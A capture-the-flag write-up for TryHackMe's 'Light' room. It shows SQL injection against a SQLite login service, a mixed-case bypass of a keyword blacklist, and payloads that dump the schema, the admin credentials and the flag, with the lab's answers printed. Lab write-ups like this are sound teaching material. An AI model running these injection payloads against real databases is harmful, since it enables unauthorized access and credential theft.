TryHackMe - Light
I am working on a database application called Light! Would you like to try it out? If so, the application is running on port 1337. You can connect to it using nc 10.10.144.90 1337 You can use the username smokey in order to get started.
The goal is to retrieve the following:
- Admin Username
- Admin Password
- Flag
We connect to the server and try the smokey user and the admin user, which does not seem to exist.
1
2
3
4
5
6
$ nc 10.10.144.90 1337
Welcome to the Light database!
Please enter your username: smokey
Password: vYQ5ngPpw8AdUmL
Please enter your username: admin
Username not found.
As it’s a database application, we can try to insert quotes to see if it breaks.
1
2
3
4
Please enter your username: "
Username not found.
Please enter your username: '
Error: unrecognized token: "''' LIMIT 30"
It seems like the query behind the scenes is:
1
SELECT * FROM users WHERE username = '{input}' LIMIT 30;
The application breaks when a single quote (') is entered, so we can now start crafting our payload to retrieve the admin username. Although I didn’t follow a structured methodology, the usual process would involve:
- Finding the database type
- Finding the database version
- Gathering the database names
- Finding the table names
- And so on
I tried several payloads and noticed that certain characters and keywords are blacklisted (/*, --, %0b, SELECT, and UNION).
1
2
3
4
5
6
Please enter your username: ' UNION select user from users;--
For strange reasons I can't explain, any input containing /*, -- or, %0b is not allowed :)
Please enter your username: 1' + sleep(10);--
For strange reasons I can't explain, any input containing /*, -- or, %0b is not allowed :)
Please enter your username: 1' UNION SELECT null
Ahh there is a word in there I don't like :(-
We can bypass this by using unusual capitalization patterns:
1
2
Please enter your username: ' Union Select 1 '
Password: 1
We can now gather some information, sqlite > 3.33 uses sqlite_master instead of sqlite_schema.
1
2
3
4
5
6
7
8
9
Please enter your username: ' UniOn Select 1,2,gRoUp_cOncaT(0x7c,schema_name,0x7c) fRoM information_schema.schemata '
Error: no such table: information_schema.schemata
Please enter your username: ' Union Select sql from sqlite_schema '
Error: no such table: sqlite_schema
Please enter your username: ' Union Select sql from sqlite_master '
Password: CREATE TABLE admintable (
id INTEGER PRIMARY KEY,
username TEXT,
password INTEGER)
We can now find the first answer to the question.
1
2
Please enter your username: ' Union Select username from admintable '
Password: TryHackMeAdmin
And the password as well:
1
2
Please enter your username: ' Union Select password from admintable where username='TryHackMeAdmin
Password: mamZtAuMlrsEy5bp6q17
To find the flag, we need to get a better vision of all data in the database, and that’s why we use group_concat to concatenate all results:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
Please enter your username: ' Union Select group_concat(sql) from sqlite_master '
Password: CREATE TABLE usertable (
id INTEGER PRIMARY KEY,
username TEXT,
password INTEGER),CREATE TABLE admintable (
id INTEGER PRIMARY KEY,
username TEXT,
password INTEGER)
Please enter your username: ' Union Select group_concat(username) from usertable '
Password: alice,rob,john,michael,smokey,hazel,ralph,steve
Please enter your username: ' Union Select group_concat(username) from usertable '
Password: alice,rob,john,michael,smokey,hazel,ralph,steve
Please enter your username: ' Union Select group_concat(username) from admintable '
Password: TryHackMeAdmin,flag
Please enter your username: ' Union Select password from admintable where username='flag
Password: THM{SQLit3_InJ3cTion_is_SimplE_nO?}